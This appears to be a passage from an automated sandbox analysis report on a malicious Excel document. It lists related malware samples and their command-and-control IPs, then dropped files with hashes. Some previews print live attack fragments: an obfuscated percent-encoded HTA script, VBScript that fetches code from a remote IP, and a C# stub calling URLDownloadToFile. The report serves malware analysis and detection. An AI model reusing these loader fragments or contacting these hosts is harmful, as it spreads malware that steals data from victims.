                        https://mail.pfl.fyi/v1/messages/0190749a-2f6a-7c9f-b37a-88f0ae969ede/click?link_id=0190749a-2ffa-7f41-ad16-3ecda235df51&signature=3e892faf1c0137166fda82e5ff5c6a3150c2cec9Get hashmaliciousHTMLPhisherBrowse
                        • 162.144.36.99
                        GJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                        • 108.179.193.98
                        MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                        • 162.240.81.18
                        kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                        • 162.241.62.63
                        https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ==Get hashmaliciousUnknownBrowse
                        • 69.49.230.170
                        7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                        • 162.240.81.18
                        TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                        • 192.254.225.136
                        TUT-ASUS6bdudXAsQW.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        H50bdqfVH2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        kZa81nzREg.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        bv8iPF7cTY.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        jsLnybSs43.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        fiDe44VTwh.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        9691e6dc404680cc6648726c8d124a6d4fc637bb6b4a092661308012438623b2_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        BomqT2a55e.exeGet hashmaliciousAgentTeslaBrowse
                        • 208.95.112.1
                        E48ALuMJ3m.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 208.95.112.1
                        TERASYST-ASBG6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                        • 94.156.69.93
                        HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                        • 94.156.69.93
                        s1C1DWgj73.elfGet hashmaliciousMiraiBrowse
                        • 94.156.67.161
                        ScjfNQG5l0.elfGet hashmaliciousUnknownBrowse
                        • 94.156.67.161
                        Jieok44uQ5.elfGet hashmaliciousMiraiBrowse
                        • 94.156.67.161
                        94.156.67.161-mips-2024-07-01T10_28_03.elfGet hashmaliciousMiraiBrowse
                        • 94.156.67.161
                        94.156.67.161-arm-2024-07-01T10_28_03.elfGet hashmaliciousUnknownBrowse
                        • 94.156.67.161
                        UHUH45EDRFQ.exeGet hashmaliciousRemcosBrowse
                        • 94.156.69.93
                        0GrL5SShus.exeGet hashmaliciousXWormBrowse
                        • 94.156.68.110
                        9444f34a94d494a78e19e19f4e1615744e500aca97a56.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                        • 94.156.68.153
                        No context
                        No context
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15189
                        Entropy (8bit):5.0343247648743
                        Encrypted:false
                        SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                        MD5:7BC3FB6565E144A52C5F44408D5D80DF
                        SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                        SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                        SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                        Malicious:false
                        Reputation:low
                        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:@...e...........................................................
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
                        Category:modified
                        Size (bytes):105733
                        Entropy (8bit):2.4409419026425443
                        Encrypted:false
                        SSDEEP:768:tZ6A3yXNA0AGALUuNWkzHtW3fppgdIgPflkzJQiXAZO:tv6
                        MD5:E6ED0C0A3FDD48EC9978D9FCD7F1CB6B
                        SHA1:8FBFA7D4840705CF9A42EDDB1B1C9A2E75A9F94F
                        SHA-256:E9CACC56F61CDAC779CE36C26E2EAEA814230C36CBB0EB9AD7516DA8CDEEB74D
                        SHA-512:ED3A1EA65B6F1EA5171BCBA3CADA176CE4375BA2B0A0D2EB08916C086F83D8E5EEC842BD17771F74911259B4A208C226CD899AA242F76B55E42AC12FEEB8D422
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].hta, Author: Joe Security
                        Preview:<Script Language='Javascript'>.. ..document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%3E%6D%3D%27%25%33%43%25%32%31%44%4F%43%54%59%50%45%25%32%30%68%74%6D%6C%25%33%45%25%30%41%25%33%43%6D%65%74%61%25%32%30%68%74%74%70%2D%65%71%75%69%76%25%33%44%25%32%32%58%2D%55%41%2D%43%6F%6D%70%61%74%69%62%6C%65%25%32%32%25%32%30%63%6F%6E%74%65%6E%74%25%33%44%25%32%32%49%45%25%33%44%45%6D%75%6C%61%74%65%49%45%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%68%74%6D%6C%25%33%45%25%30%41%25%33%43%62%6F%64%79%25%33%45%25%30%41%25%33%43%73%63%72%69%70%54%25%32%30%74%79%50%65%25%33%44%25%32%32%74%45%58%74%2F%76%42%73%43%72%69%70%74%25%32%32%25%33%45%25%30%41%44%49%6D%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3496
                        Entropy (8bit):3.7329279321322377
                        Encrypted:false
                        SSDEEP:96:d/tbU3I/tK/tGU/tz/toU3o/tUq0qbqV1U3Iqx/tZ:d1IY1K1f1z1LY1Z5GVylx1Z
                        MD5:C8620389239F57F69E0A272F8A713231
                        SHA1:A2C026675520C308785673FB0DF0DEFEB545071C
                        SHA-256:0A807D8F8F5764C4B282F67C9F2F73788077BDB36CB40D28109D72DEADFEAF06
                        SHA-512:4CF71A2FA395F75D888F8D33C5C722956ADEF72E7FDA38CA783106540BC42B312107C3F0B2177912F7437E590F567B656F773B7945502BBDEE3E8353B15EF312
                        Malicious:false
                        Preview:..D.i.m. .c.z.x.R.O.u.L.h.K.U.c.G.a.e.c.e.o.e.m.K.B.N.q.e.k.p.L.Q.B.W.O.p.A.m.i.i.Z.a.p.C.i.s.b.K.Q.m.L.L.L.W.n.u.l.W.p.z.a.G.k.f.i.b.n.G.C.I.W.p.L.T.d.K.m.G.z.h.P.u.e.A.q.l.S.K.c.J.I.A.p.K.x.n.c.e.k.J.P.O.U.u.,. .P.A.m.K.P.t.v.h.e.R.o.W.m.d.S.f.f.c.k.l.i.O.m.O.k.A.h.f.W.N.e.s.o.O.A.z.W.c.o.m.Z.n.b.L.c.n.p.a.f.i.K.L.L.G.N.W.U.G.A.a.p.T.G.R.d.i.K.G.o.p.G.O.N.s.K.Z.A.f.j.c.W.n.L.S.R.C.a.P.i.K.h.e.Q.I.e.c.A.x.z.f.....S.e.t. .c.z.x.R.O.u.L.h.K.U.c.G.a.e.c.e.o.e.m.K.B.N.q.e.k.p.L.Q.B.W.O.p.A.m.i.i.Z.a.p.C.i.s.b.K.Q.m.L.L.L.W.n.u.l.W.p.z.a.G.k.f.i.b.n.G.C.I.W.p.L.T.d.K.m.G.z.h.P.u.e.A.q.l.S.K.c.J.I.A.p.K.x.n.c.e.k.J.P.O.U.u. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....c.z.x.R.O.u.L.h.K.U.c.G.a.e.c.e.o.e.m.K.B.N.q.e.k.p.L.Q.B.W.O.p.A.m.i.i.Z.a.p.C.i.s.b.K.Q.m.L.L.L.W.n.u.l.W.p.z.a.G.k.f.i.b.n.G.C.I.W.p.L.T.d.K.m.G.z.h.P.u.e.A.q.l.S.K.c.J.I.A.p.K.x.n.c.e.k.J.P.O.U.u...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.4...1.5.6...6.5...2.4.7./.U.s.e.r.s._.A.P.I./.n.
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):50128
                        Entropy (8bit):3.13941905677619
                        Encrypted:false
                        SSDEEP:768:4tHbsyguSUifiMcUzARRwn8KEVhyQBzKVO15DQclSBxkrSsAQYWS:yKDAMjARdKGhy0fyBy6
                        MD5:A4D3F37D25C314D8BD34E11152527E97
                        SHA1:6DF7C881FE8102F196CAE0D5AF9C00CC26583B02
                        SHA-256:E0B38B2C8079038B0C98440A0A5945CBB86A41B72154D83EE25F8D362020F9BF
                        SHA-512:6E95CA122B9718F0E80D5B666A294A066479365D910F3E450B535ABCEA7F55204122D1CB346DFDF69037FA9CA6EC821A1C05A5F13A162A74D509343F9006D1B2
                        Malicious:false
                        Preview:.................N...-..........g...Ca.. EMF................M...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...2. .(.5.c.3.e.8.0.d.,. .2.0.1.7.-.0.8.-.0.6.)...d.1.2.8.0.2.2.b.9.4.c.b.b.c.6.0.6.e.e.1.3.5.0.4.5.e.b.2.7.1.0.2...e.m.f.....................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...&...Drawing=1609.4x937.4px, 425.8x248.0mm...............................................................'.......................%...........%...........;................... ...6............#..6............*..6............-..6...........?-..6............-..6............*..6.......!....#..6.......!... ...6.......!...L...6...........U...6.........../...6...............6.........../...6...........U...6...........L...=.......<.......>.......................%...........(...........'.......................%...........%...........;...............z(......6.......u(......6.......o(......6.......n(..I...6.......n(..q...6.......p(......6...
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):13328680
                        Entropy (8bit):1.5643268842466118
                        Encrypted:false
                        SSDEEP:768:q63AJhP7YgsXW9s7Z+3Zv6j6M1cv+BINGkIsIdDcFXXlG5xK0SN7u:q7o3+3ZviTcvoDkXlG5XSQ
                        MD5:1C8A27A855C0DD3D630001F079C71047
                        SHA1:F17C4626E74E3EB5395A9E26C79198D7A3B77DCA
                        SHA-256:53A48F455EBB72C9EA2149A762BB86E580D30710ED4AFBEEFBDB8C1F751023EA
                        SHA-512:C7CECD5AFDC67B47E1C977861136C17E45CCFCB19849983D90C5C9E79F8B80C4EEA883C7C2639363433D89A97D6C92858B8E5D8811AFD661142BF1887B3935D8
                        Malicious:false
                        Preview:....l...........P...............A_...... EMF....(a..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q......."...........!...............................................Q.......'.......................%...........................................................&...........................%...........................6.......P.......%...........L...d...........O...............P.......!...
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Jul 3 16:03:32 2024, 1st section name ".debug$S"
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.9850056326180887
                        Encrypted:false
                        SSDEEP:24:H7e9E2U3lQK4dHCwKdNWI+ycuZhNDpakSaePNnqSqd:v3lQKw5Kd41ulDpa3aCqSK
                        MD5:94C96E2747C52551EF2BF0727B1E232E
                        SHA1:F621291C4D6B1FC2976219B8EB5AD590A24377FC
                        SHA-256:3F44794251CDDFADFC1E55DAC3D0B796F5BD185D7C12BD1802DF6B01D4CEA94E
                        SHA-512:3E01EA1BFE89DD0C39913A5D3DA028508111BAFC77BA736AFF63F7E38D9B23A765D410C406D434C6DF782F14A9EA22CB7B07C8270E458CAFECEBD8356CF4BF9F
                        Malicious:false
                        Preview:L...Tv.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP...............(.;q.8..R.-?............4.......C:\Users\user\AppData\Local\Temp\RESC2C3.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.b.o.g.l.g.l.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0757554631855686
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryJpak7YnqqaePN5Dlq5J:+RI+ycuZhNDpakSaePNnqX
                        MD5:280C3B719938E3E652FD2D3FDAB9DE96
                        SHA1:E0271AA8ADB600F078E9EAC7EDA8C70C6786C3F5
                        SHA-256:C598D3A84862B69433B4236F10575775FBB43BE36BE796B278FDC5A95EA177EC
                        SHA-512:A3A1D6869B8919D1FB9987E063DA99151BFED30BC7E8EF1A3EF7D252242ACA914D9A7597DF4776EA36AF000073A2B98E34664A11D522D96216A47E9AC3999FE3
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.b.o.g.l.g.l.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.b.o.g.l.g.l.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (333)
                        Category:dropped
                        Size (bytes):452
                        Entropy (8bit):3.904626507398481
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuEwlkxMm7J/QXReKJ8SRHy4HVykKmaaRhj/OQy:V/DTLDfuZnXfHZdhqQy
                        MD5:945B8020556329B43BB4499CCB741C84
                        SHA1:B2B61706BA6CF8B3A0511A3537E18592AFDA3ED1
                        SHA-256:E8234CAB7F250679262F845E87C64B27F7B1B4C69168AECCDBB132C36A09EA7E
                        SHA-512:F639C75341CD01C4048FD11AAD531D3C968511113FBBEF87BB77303DC508C5D84B3FD097FADB016A5C1F1150C9750628D2CE1944F0AC1149A2C3321CBF02D369
                        Malicious:false
                        Preview:.using System;.using System.Runtime.InteropServices;..namespace SznU.{. public class vSpIMrRvIzU. {. [DllImport("UrlMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr pimFCSaX,string F,string cHXhTKsrpH,uint YKQ,IntPtr GF);.. }..}.
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                        Category:dropped
                        Size (bytes):369
                        Entropy (8bit):5.191095799113595
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fGMdHy4Gzxs7+AEszIP23fGMdHy4b:p37Lvkmb6KzX7GWZEoX7b
                        MD5:6E62E6D34A9AFDD13DA5041A6D926D8E
                        SHA1:14A25CE77C6DE59697CB12D3552AB9F011511DF3
                        SHA-256:5D047D76B232F2B72954D321A934CD5105925C5F23234467861B5C1BDAE48C11
                        SHA-512:B5C9FF6CE7FE26BE00E9A1BA9B812E40CDFA25EBDABE2A91A0A4CC1B20B2AA03C4230E4D5F32FCE685CD332F74D777AF5E3D198C4362F25652F50718D138EB22
                        Malicious:true
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.0.cs"
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3072
                        Entropy (8bit):2.81246736116654
                        Encrypted:false
                        SSDEEP:24:etGS5PBG5eM7p88MNck347hML0itkZfbb/qhkWI+ycuZhNDpakSaePNnq:6ysM+1X4iL0lJn/EH1ulDpa3aCq
                        MD5:9ED72217E6BD3767BDD83618AC8E18AD
                        SHA1:99DF57D3A70B70E0914C527A1E153816D8A65066
                        SHA-256:37EC58FE9E05D0B5EF65B959FBA3F71FE397EC884474706EE6F1D038007AD7F2
                        SHA-512:C81D46D07947F4DFE0562F99C852719418EBE8A5DE92C1898791BED96EC62A8802BC1A7918A9FBAF15CBA63165AC70E1DA3400FE194E5A1245C68BEE1630E741
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Tv.f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....t.....t...........................#.............. ?.....P ......Q.........W.....`.....b.....m.....q...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.cb
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.31809813940785
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzXbEoXGKaMD5DqBVKVrdFAMBJTH:Akka60XbEoXGKdDcVKdBJj
                        MD5:5AF8062D37D50A3C61ACCC661ACEC45D
                        SHA1:9ABF04BD99001FA345BCD1C99D359B4D187866EA
                        SHA-256:CDD7C81A7DEDA790714945589309CB3ADA9230889BAC4B70C6EC21311DA99F1B
                        SHA-512:B6DCF33926F1DB80C562D90130CB422C6BF1401633292C4D9FC24EC7A815511C2C9710149307A24F8669775C418E2541D417C718379205A5E3D4256A486CCBC4
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):30208
                        Entropy (8bit):7.295421921064184
                        Encrypted:false
                        SSDEEP:768:gqTAUBP+dudGXy6dMR90KVIKivZttEce:gqTAgWdudGXHKR9VPIgce
                        MD5:69089DE8DEC2B3E805A4150ADDF5F6A3
                        SHA1:F69D25E8822F8AC447CC02E559A512E7CE5EF3E7
                        SHA-256:F3045ECA240449AB56F863C88D9ED8C4432C983627DC14244BAC7BC717D367AE
                        SHA-512:D8F64717164AE441E918BA52D6E5508FC3F27D505F8EC77D5FCAC407E9AE84840C42E3633FCE655708AFB890878AEFA1C4F3D29B3A9CCA6B937C87517253C307
                        Malicious:false
                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9.......................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):45056
                        Entropy (8bit):5.324210931163022
                        Encrypted:false
                        SSDEEP:768:8qTAUBP+dudGXy6dMR90KVIKivZttEce:8qTAgWdudGXHKR9VPIgce
                        MD5:8551A36C4FFA8047811A665A6D807682
                        SHA1:2D070518FC41135178C3CA38B17F593ECF98830E
                        SHA-256:EE6844F155F622BD715A5255318B143A9AEEA84CCB37073A9C2BEAD64D3B3BB3
                        SHA-512:888A87B8170DE9F0957BA3DD28BB74A9D1E40E55DDA8F90D44A6905E46854FF419D01594068C258893780183F8D9D9077A5E2E6126CF13492E2CB773F6F1DA37
                        Malicious:false
                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
